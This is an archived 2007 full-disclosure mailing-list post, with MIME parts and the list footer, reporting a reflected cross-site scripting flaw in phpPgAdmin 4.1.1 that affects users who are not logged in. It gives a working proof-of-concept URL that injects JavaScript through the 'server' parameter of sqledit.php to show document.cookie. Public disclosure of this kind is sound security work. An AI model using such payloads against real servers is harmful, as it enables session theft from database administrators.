phpPgAdmin XSS Vulnerability

"Michal Majchrowicz" <[email protected]> Wed, 23 May 2007 01:28:59 +0200
Newsgroups gmane.comp.security.full-disclosure,gmane.comp.security.bugtraq,gmane.comp.security.vulnerabilities.watch.general
Message-ID <[email protected]>
--===============0586063436==
Content-Type: multipart/alternative; 
	boundary="----=_Part_139834_25106428.1179876539408"

------=_Part_139834_25106428.1179876539408
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

There is a JavaScript code Injection in phpPgAdmin which fails to correctly
sanitize user supplied data. As a result very simple XSS is possible. This
was tested on phpPgAdmin 4.1.1 as not logged user.
PoC:
https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow');alert(document.cookie);alert('phpPgAdmin%204.1.1%20XSS%20Vulnerability');//
Regards Michal Majchrowicz.
Hack.pl

------=_Part_139834_25106428.1179876539408
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

There is a JavaScript code Injection in phpPgAdmin which fails to correctly sanitize user supplied data. As a result very simple XSS is possible. This was tested on phpPgAdmin 4.1.1 as not logged user.<br>PoC:<br><a href="https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow&#39;);alert(document.cookie);alert(&#39;phpPgAdmin%204.1.1%20XSS%20Vulnerability&#39;);//">
https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow&#39;);alert(document.cookie);alert(&#39;phpPgAdmin%204.1.1%20XSS%20Vulnerability&#39;);//</a><br>Regards Michal Majchrowicz.<br>Hack.pl<br>

------=_Part_139834_25106428.1179876539408--


--===============0586063436==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============0586063436==--